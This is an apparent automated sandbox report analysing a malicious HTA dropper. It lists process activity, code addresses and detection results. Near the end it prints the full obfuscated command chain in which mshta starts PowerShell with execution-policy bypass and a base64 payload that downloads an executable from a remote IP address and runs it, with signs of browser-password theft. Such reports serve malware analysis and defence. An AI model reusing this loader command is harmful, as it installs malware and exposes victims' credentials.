                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04342AB0 NtWaitForSingleObject,21_2_04342AB0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04342B80 NtQueryInformationFile,21_2_04342B80
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_02429210 NtReadFile,21_2_02429210
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_02429300 NtDeleteFile,21_2_02429300
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_024293A0 NtClose,21_2_024293A0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_024290B0 NtCreateFile,21_2_024290B0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_02429510 NtAllocateVirtualMemory,21_2_02429510
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_03813DD8 CreateProcessAsUserW,12_2_03813DD8
                        Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_038020B412_2_038020B4
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_0041860317_2_00418603
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_0040E04C17_2_0040E04C
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_0041005317_2_00410053
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_0040E05317_2_0040E053
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_0040306017_2_00403060
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_0041680317_2_00416803
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_0040E19717_2_0040E197
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_0040E1A317_2_0040E1A3
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_00401BE517_2_00401BE5
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_00401BF017_2_00401BF0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_0042EC6317_2_0042EC63
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_0040FE3317_2_0040FE33
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_004167FE17_2_004167FE
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C970C017_2_30C970C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D3F0CC17_2_30D3F0CC
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D4F0E017_2_30D4F0E0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D470E917_2_30D470E9
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D481CC17_2_30D481CC
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C9B1B017_2_30C9B1B0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D501AA17_2_30D501AA
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC516C17_2_30CC516C
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F17217_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D5B16B17_2_30D5B16B
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8010017_2_30C80100
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D2A11817_2_30D2A118
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAB2C017_2_30CAB2C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D312ED17_2_30D312ED
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C952A017_2_30C952A0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D3027417_2_30D30274
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D503E617_2_30D503E6
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C9E3F017_2_30C9E3F0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CD739A17_2_30CD739A
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D4A35217_2_30D4A352
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7D34C17_2_30C7D34C
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D4132D17_2_30D4132D
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D3E4F617_2_30D3E4F6
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D4244617_2_30D42446
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8146017_2_30C81460
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D4F43F17_2_30D4F43F
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D5059117_2_30D50591
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D2D5B017_2_30D2D5B0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D4757117_2_30D47571
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C9053517_2_30C90535
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D416CC17_2_30D416CC
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAC6E017_2_30CAC6E0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8C7C017_2_30C8C7C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D4F7B017_2_30D4F7B0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CB475017_2_30CB4750
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C9077017_2_30C90770
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C938E017_2_30C938E0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CBE8F017_2_30CBE8F0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C768B817_2_30C768B8
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C9284017_2_30C92840
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C9A84017_2_30C9A840
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C929A017_2_30C929A0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D5A9A617_2_30D5A9A6
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C9995017_2_30C99950
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAB95017_2_30CAB950
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA696217_2_30CA6962
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D3DAC617_2_30D3DAC6
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8EA8017_2_30C8EA80
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CD5AA017_2_30CD5AA0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D2DAAC17_2_30D2DAAC
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D47A4617_2_30D47A46
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D4FA4917_2_30D4FA49
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D03A6C17_2_30D03A6C
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D46BD717_2_30D46BD7
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CCDBF917_2_30CCDBF9
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAFB8017_2_30CAFB80
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D4AB4017_2_30D4AB40
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D4FB7617_2_30D4FB76
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D4FCF217_2_30D4FCF2
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C80CF217_2_30C80CF2
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D30CB517_2_30D30CB5
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C90C0017_2_30C90C00
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D09C3217_2_30D09C32
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAFDC017_2_30CAFDC0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8ADE017_2_30C8ADE0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA8DBF17_2_30CA8DBF
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C93D4017_2_30C93D40
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D41D5A17_2_30D41D5A
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D47D7317_2_30D47D73
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C9AD0017_2_30C9AD00
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D4EEDB17_2_30D4EEDB
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D4CE9317_2_30D4CE93
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA2E9017_2_30CA2E90
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C99EB017_2_30C99EB0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C90E5917_2_30C90E59
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D4EE2617_2_30D4EE26
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C82FC817_2_30C82FC8
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C9CFE017_2_30C9CFE0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C91F9217_2_30C91F92
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D4FFB117_2_30D4FFB1
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D04F4017_2_30D04F40
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D4FF0917_2_30D4FF09
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CD2F2817_2_30CD2F28
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CB0F3017_2_30CB0F30
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_1_0040125017_1_00401250
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_1_0040306017_1_00403060
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_1_0040201917_1_00402019
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_1_0040316017_1_00403160
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_1_0040224917_1_00402249
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_1_00401BF017_1_00401BF0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_1_00401D6917_1_00401D69
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_1_00401D7017_1_00401D70
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_1_00401F6917_1_00401F69
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_1_00401F8817_1_00401F88
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043CF43F21_2_043CF43F
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0430146021_2_04301460
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043C244621_2_043C2446
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043BE4F621_2_043BE4F6
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0431053521_2_04310535
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043C757121_2_043C7571
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043AD5B021_2_043AD5B0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043D059121_2_043D0591
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0432C6E021_2_0432C6E0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043C16CC21_2_043C16CC
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0431077021_2_04310770
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0433475021_2_04334750
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043CF7B021_2_043CF7B0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043C70E921_2_043C70E9
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043CF0E021_2_043CF0E0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043170C021_2_043170C0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043BF0CC21_2_043BF0CC
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043AA11821_2_043AA118
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0430010021_2_04300100
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043DB16B21_2_043DB16B
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_042FF17221_2_042FF172
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0431B1B021_2_0431B1B0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043D01AA21_2_043D01AA
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043C81CC21_2_043C81CC
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043B027421_2_043B0274
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043152A021_2_043152A0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043B12ED21_2_043B12ED
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0432B2C021_2_0432B2C0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043C132D21_2_043C132D
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_042FD34C21_2_042FD34C
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043CA35221_2_043CA352
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0435739A21_2_0435739A
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0431E3F021_2_0431E3F0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043D03E621_2_043D03E6
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04389C3221_2_04389C32
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04310C0021_2_04310C00
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043B0CB521_2_043B0CB5
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04300CF221_2_04300CF2
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043CFCF221_2_043CFCF2
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0431AD0021_2_0431AD00
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043C7D7321_2_043C7D73
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043C1D5A21_2_043C1D5A
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04313D4021_2_04313D40
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04328DBF21_2_04328DBF
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0430ADE021_2_0430ADE0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0432FDC021_2_0432FDC0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043CEE2621_2_043CEE26
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04310E5921_2_04310E59
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04319EB021_2_04319EB0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04322E9021_2_04322E90
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043CCE9321_2_043CCE93
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043CEEDB21_2_043CEEDB
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04330F3021_2_04330F30
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043CFF0921_2_043CFF09
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04384F4021_2_04384F40
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043CFFB121_2_043CFFB1
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04311F9221_2_04311F92
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0431CFE021_2_0431CFE0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04302FC821_2_04302FC8
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0431284021_2_04312840
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0431A84021_2_0431A840
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_042F68B821_2_042F68B8
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0433E8F021_2_0433E8F0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043138E021_2_043138E0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0432696221_2_04326962
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0431995021_2_04319950
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0432B95021_2_0432B950
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043129A021_2_043129A0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043DA9A621_2_043DA9A6
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04383A6C21_2_04383A6C
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043CFA4921_2_043CFA49
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043C7A4621_2_043C7A46
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_04355AA021_2_04355AA0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043ADAAC21_2_043ADAAC
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0430EA8021_2_0430EA80
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043BDAC621_2_043BDAC6
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043CFB7621_2_043CFB76
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043CAB4021_2_043CAB40
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0432FB8021_2_0432FB80
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_043C6BD721_2_043C6BD7
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_02411CC021_2_02411CC0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0241534021_2_02415340
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0241354021_2_02413540
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0241353B21_2_0241353B
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0240CB7021_2_0240CB70
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0242B9A021_2_0242B9A0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0240AED421_2_0240AED4
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0240AEE021_2_0240AEE0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0240AD8921_2_0240AD89
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0240AD9021_2_0240AD90
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0240CD9021_2_0240CD90
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_041CE77321_2_041CE773
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_041CE2B421_2_041CE2B4
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_041CE3D321_2_041CE3D3
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_041CD83821_2_041CD838
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_041D38FB21_2_041D38FB
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_041CCAF321_2_041CCAF3
                        Source: Joe Sandbox ViewDropped File: C:\Users\user\Links\iaoqralA.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: String function: 30D0F290 appears 105 times
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: String function: 30CD7E54 appears 88 times
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: String function: 30C7B970 appears 266 times
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: String function: 30CC5130 appears 36 times
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: String function: 30CFEA12 appears 84 times
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: String function: 0437EA12 appears 84 times
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: String function: 04345130 appears 36 times
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: String function: 04357E54 appears 88 times
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: String function: 0438F290 appears 105 times
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: String function: 042FB970 appears 266 times
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: String function: 03804414 appears 246 times
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: String function: 03813F9C appears 54 times
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: String function: 0380421C appears 66 times
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: String function: 0380457C appears 804 times
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: String function: 03814018 appears 45 times
                        Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                        Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winHTA@29/24@16/11
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_03807B0E GetDiskFreeSpaceA,12_2_03807B0E
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\csrss[1].exeJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7740:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5708:120:WilError_03
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yeu4nxga.cn4.ps1Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: systeminfo.exe, 00000015.00000002.3625591179.000000000251A000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000015.00000003.1746011563.000000000251A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: fgd.htaVirustotal: Detection: 42%
                        Source: fgd.htaReversingLabs: Detection: 30%
                        Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\fgd.hta"
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'JGMxS3luICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlcmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERock8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGpiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHR1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJnaVNLZHFIUUUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZT2giICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhaUFogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGMxS3luOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjYuMTQzLzQ3MC9jc3Jzcy5leGUiLCIkRW52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO1N0YVJULXNsZWVQKDMpO2luVk9LRS1JdEVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxjc3Jzcy5leGUi'+[cHaR]0x22+'))')))"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; 